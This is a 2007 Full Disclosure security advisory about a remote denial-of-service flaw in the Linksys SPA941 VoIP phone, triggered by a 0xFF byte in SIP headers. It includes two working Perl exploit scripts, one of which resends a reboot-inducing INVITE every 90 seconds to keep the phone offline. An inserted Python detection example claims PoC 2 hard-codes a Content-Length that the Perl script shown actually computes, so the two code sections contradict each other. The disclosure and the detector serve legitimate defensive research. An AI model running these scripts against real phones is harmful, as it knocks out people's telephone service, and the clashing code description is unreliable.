Full Disclosure mailing list archives
Linksys SPA941 remote DOS with \377 character
From: "Radu State" <state () loria fr>
Date: Tue, 24 Apr 2007 14:34:27 +0200
MADYNES Security Advisory
http://madynes.loria.fr

Title: Linksys SPA941 remote DOS with \377 character
Discovery Date: 01/02/2007
Vendor notification: 4/04/2007 and 17/04/2007
Release Date: 24/04/2007
Severity: Moderate - Denial of Service
Advisory ID: KIHP3

Vulnerability in Linksys SPA941

Synopsis:
After receiving a crafted SIP message the device immediately reboots. The phone does not handle the byte \377 (0xFF) properly when it appears in a SIP header field. The vendor was informed and a fixed firmware will be made available. This vulnerability was identified by the Madynes research team at INRIA Lorraine, using the Madynes VoIP fuzzer.

Background:
SIP is the IETF standardized protocol (RFCs 2543 and 3261) for VoIP signaling. SIP is ASCII based; the INVITE message is used to initiate and maintain a communication session.

Configuration of our device:
* Software Version: 5.1.5
* IP address obtained by DHCP: 192.168.1.107
* User Name: linksys

Vulnerability:
The phone may reboot and/or reply with invalid messages. It cannot handle the character \377 (a byte with all bits set) in a message. Depending on where this character is located the phone may reboot (e.g. when it appears in any part of the From header). If the character is located elsewhere, it may alter the content of the replies generated by the phone, as shown in exploit 1. Different behaviour is observed depending on the number of \377 characters and their location. It looks like a format string vulnerability, but the firmware was not investigated to confirm this.

The Linksys IP Phone SPA941 (firmware 5.1.5) cannot cope with \377 characters in the From field when the real source port (the UDP port in the IP packet) is different from the port given in the SIP From field.

Exploit 1)
In this exploit we put a \377 character before every carriage return. The replies are modified in their status line and most of the headers are erased.

To run the exploit, the file linksys-5.1.5.pl should be launched (assuming our configuration) as:

perl linksys-5.1.5.pl 192.168.1.107 5060 linksys

POC 1:

#!/usr/bin/perl
# PoC 1: INVITE with a \377 byte before every CRLF. The phone's replies
# come back with a mangled status line and most headers missing.
use strict;
use warnings;
use IO::Socket::INET;

die "Usage $0 <dst> <port> <username>\n" unless @ARGV == 3;
my ($dst, $port, $user) = @ARGV;

my $socket = IO::Socket::INET->new(PeerAddr => $dst,
                                   PeerPort => $port,
                                   Proto    => 'udp')
    or die "cannot create socket: $!";

# Every line, including the request line, is terminated by \377 CRLF.
my $msg = join('',
    "INVITE sip:$user\@$dst SIP/2.0\377\r\n",
    "Via: SIP/2.0/UDP 192.168.1.2;rport;branch=00\377\r\n",
    "Max-Forwards: 70\377\r\n",
    "To: lynksys <sip:$user\@$dst>\377\r\n",
    "From: <sip:tucuman\@192.168.1.2>;tag=00\377\r\n",
    "Call-ID: tucu\@192.168.1.2\377\r\n",
    "CSeq: 24865 INVITE\377\r\n",
    "Contact: <sip:tucu\@192.168.1.2>\377\r\n",
    "Supported: 100rel\377\r\n",
    "Content-Length: 0\377\r\n",
    "\r\n");

$socket->send($msg);

Exploit 2)
In order to reboot the phone remotely, the following PoC will work. If the phone is called with PoC 2 it rings; when the call is answered the phone reboots immediately, otherwise it reboots after some time. The PoC resends the killer message every 90 seconds, the time needed for a reboot, and so performs an effective DoS. It also binds a UDP socket on the local machine to the port announced in the Via header, so that the phone's replies are accepted rather than answered with ICMP port unreachable errors (the UDP counterpart of a TCP RST). The same can be obtained with a firewall rule or with netcat.

POC 2:

Command: perl script.pl <username> <dst_IP> <SourceIp> <sourceport>

E.g.: perl script.pl 101 152.81.114.195 152.81.12.93 5060

Script code:

#!/usr/bin/perl
# PoC 2: INVITE with a \377 byte in the From header, resent every 90 s
# (about one reboot cycle) so that the phone never comes back up.
use strict;
use warnings;
use IO::Socket::INET;

die "Usage $0 <username> <dst_IP> <SourceIp> <sourceport>\n" unless @ARGV == 4;
my ($touser, $target, $sourceaddress, $sourceport) = @ARGV;

# Bind the port advertised in Via so that the phone's replies are
# accepted instead of being answered with ICMP port unreachable.
my $sock = IO::Socket::INET->new(LocalAddr => $sourceaddress,
                                 LocalPort => $sourceport,
                                 Proto     => 'udp')
    or die "no socket: $!";

# The killer message itself goes out from port 5061.
my $socket = IO::Socket::INET->new(PeerAddr  => $target,
                                   PeerPort  => 5060,
                                   Proto     => 'udp',
                                   LocalAddr => $sourceaddress,
                                   LocalPort => 5061)
    or die "no socket: $!";

my $fromuserid = int(rand(2000)) + 1;   # random user part, 1..2000
my $cseq = "INVITE";

my $sdp = join('',
    "v=0\r\n",
    "o=0 0 0 IN IP4 $sourceaddress\r\n",
    "s=Session SDP\r\n",
    "c=IN IP4 $sourceaddress\r\n",
    "t=0 0\r\n",
    "m=audio 9876 RTP/AVP 0\r\n",
    "a=rtpmap:0 PCMU/8000\r\n");

# Content-Length is computed from the body instead of being hard-coded.
my $msg = join('',
    "INVITE sip:$touser\@$target SIP/2.0\r\n",
    "Via: SIP/2.0/UDP $sourceaddress:$sourceport;branch=z9hG4bK00000\r\n",
    "From: \377<sip:$fromuserid\@$sourceaddress>;tag=779\r\n",
    "To: Receiver <sip:$touser\@$target>\r\n",
    "Call-ID: 10\@$sourceaddress\r\n",
    "CSeq: 1 $cseq\r\n",
    "Contact: 779 <sip:$fromuserid\@$sourceaddress>\r\n",
    "Expires: 1200\r\n",
    "Max-Forwards: 70\r\n",
    "Content-Type: application/sdp\r\n",
    "Content-Length: " . length($sdp) . "\r\n",
    "\r\n",
    $sdp);

while (1) {
    $socket->send($msg);
    sleep 90;
}

Impact:
A malicious user can remotely crash the phone and perform a denial of service attack by sending a single crafted SIP message. This is conceptually similar to the "ping of death".

Resolution:
Fixed software will be made available. Following recommended best practices (i.e. segregating VoIP traffic from data traffic) will protect the phone from malicious traffic in most situations.
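The check the phone's SIP parser evidently lacks is a strict one on header bytes before anything is parsed or echoed back. The following is an added example, not code from the advisory or from Linksys: it scans a SIP datagram for bytes that RFC 3261 never permits in a header line (the \377 byte, 0xFF in hex, is neither US-ASCII nor a valid UTF-8 byte, so it is always reported) and checks the declared Content-Length against the body that actually arrived. The three datagrams at the bottom are constructed here from the two PoC messages above plus a cleaned-up copy; the function and finding texts are this example's own naming.

```python
"""
Strict SIP header check of the kind the SPA941's parser was missing.
Added example, not part of the Madynes advisory.  Perl's "\377" is the
same byte as Python's b"\xff".
"""
import re

CRLF = b"\r\n"
CONTENT_LENGTH = re.compile(rb"(?i)(?:content-length|l)\s*:\s*(.*)$")


def bad_bytes(line: bytes) -> list:
    """Offsets and values of bytes that cannot occur in a SIP header line.

    RFC 3261 header values are TEXT-UTF8char (0x21-0x7E or UTF-8
    non-ASCII) plus SP/HTAB, so any control character other than HTAB,
    and any byte that breaks strict UTF-8 decoding, is reported.
    """
    bad = {(i, b) for i, b in enumerate(line)
           if (b < 0x20 and b != 0x09) or b == 0x7F}
    pos = 0
    while pos < len(line):
        try:
            line[pos:].decode("utf-8")
            break
        except UnicodeDecodeError as err:
            off = pos + err.start
            bad.add((off, line[off]))
            pos = off + 1          # keep scanning after the offending byte
    return sorted(bad)


def check_sip_datagram(data: bytes) -> list:
    """Return a list of findings for one UDP payload; [] means clean."""
    findings = []
    head, sep, body = data.partition(CRLF + CRLF)
    if not sep:
        findings.append("header section is not terminated by CRLF CRLF")
        body = b""
    declared = None
    for n, line in enumerate(head.split(CRLF), start=1):
        for off, b in bad_bytes(line):
            findings.append("line %d: illegal byte 0x%02X at offset %d" % (n, b, off))
        m = CONTENT_LENGTH.match(line) if n > 1 else None
        if m:
            value = m.group(1).strip()
            if value.isdigit():
                declared = int(value)
            else:
                findings.append("line %d: Content-Length value %r is not a number" % (n, value))
    if declared is not None and declared != len(body):
        findings.append("Content-Length says %d but body is %d bytes" % (declared, len(body)))
    return findings


# Constructed from PoC 1: a 0xFF byte before every CRLF, empty body.
POC1 = (b"INVITE sip:linksys@192.168.1.107 SIP/2.0\xff\r\n"
        b"Via: SIP/2.0/UDP 192.168.1.2;rport;branch=00\xff\r\n"
        b"Max-Forwards: 70\xff\r\n"
        b"To: lynksys <sip:linksys@192.168.1.107>\xff\r\n"
        b"From: <sip:tucuman@192.168.1.2>;tag=00\xff\r\n"
        b"Call-ID: tucu@192.168.1.2\xff\r\n"
        b"CSeq: 24865 INVITE\xff\r\n"
        b"Contact: <sip:tucu@192.168.1.2>\xff\r\n"
        b"Supported: 100rel\xff\r\n"
        b"Content-Length: 0\xff\r\n"
        b"\r\n")

# Constructed from PoC 2: one 0xFF in From, plus the hard-coded
# Content-Length: 133 that does not match the SDP actually sent.
POC2_SDP = (b"v=0\r\n"
            b"o=0 0 0 IN IP4 152.81.12.93\r\n"
            b"s=Session SDP\r\n"
            b"c=IN IP4 152.81.12.93\r\n"
            b"t=0 0\r\n"
            b"m=audio 9876 RTP/AVP 0\r\n"
            b"a=rtpmap:0 PCMU/8000\r\n")
POC2 = (b"INVITE sip:101@152.81.114.195 SIP/2.0\r\n"
        b"Via: SIP/2.0/UDP 152.81.12.93:5060;branch=z9hG4bK00000\r\n"
        b"From: \xff<sip:1234@152.81.12.93>;tag=779\r\n"
        b"To: Receiver <sip:101@152.81.114.195>\r\n"
        b"Call-ID: 10@152.81.12.93\r\n"
        b"CSeq: 1 INVITE\r\n"
        b"Contact: 779 <sip:1234@152.81.12.93>\r\n"
        b"Expires: 1200\r\n"
        b"Max-Forwards: 70\r\n"
        b"Content-Type: application/sdp\r\n"
        b"Content-Length: 133\r\n"
        b"\r\n" + POC2_SDP)

# The same INVITE with the 0xFF removed and Content-Length corrected.
CLEAN = POC2.replace(b"\xff", b"").replace(
    b"Content-Length: 133", b"Content-Length: %d" % len(POC2_SDP))

if __name__ == "__main__":
    for name, pkt in (("PoC 1", POC1), ("PoC 2", POC2), ("clean", CLEAN)):
        print(name, check_sip_datagram(pkt) or "OK")
```

Run as a script it prints the findings for each sample; PoC 1 trips on every line, PoC 2 on the From header and the Content-Length mismatch, and the cleaned INVITE passes. Only the header section is scanned: the body may legitimately be binary, which is why Content-Length is verified rather than its contents.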
From Linksys' response we include the following resolution:

This style of attack, limited to a single end point and executed from behind a secure firewall, should not affect an entire network and in most cases should easily be contained by the local network management entity. Linksys will directly address this issue with a future release of the phone firmware.

Distribution:
The advisory will be posted on the following website: madynes.loria.fr
The advisory will be posted to the following mailing lists:
Voipsec: voipsec () voipsa org
Full-Disclosure: full-disclosure () lists grok org uk

Credits:
Balamurugan Karpagavinayagam (Software engineer)
Humberto J. Abdelnur (Ph.D. student)
Radu State (Ph.D.)
Olivier Festor (Ph.D.)

This vulnerability was identified by the Madynes research team at INRIA Lorraine, using the Madynes VoIP fuzzer.

Information about us:
Madynes is a research team at INRIA Lorraine working on VoIP security assessment, intrusion detection and prevention.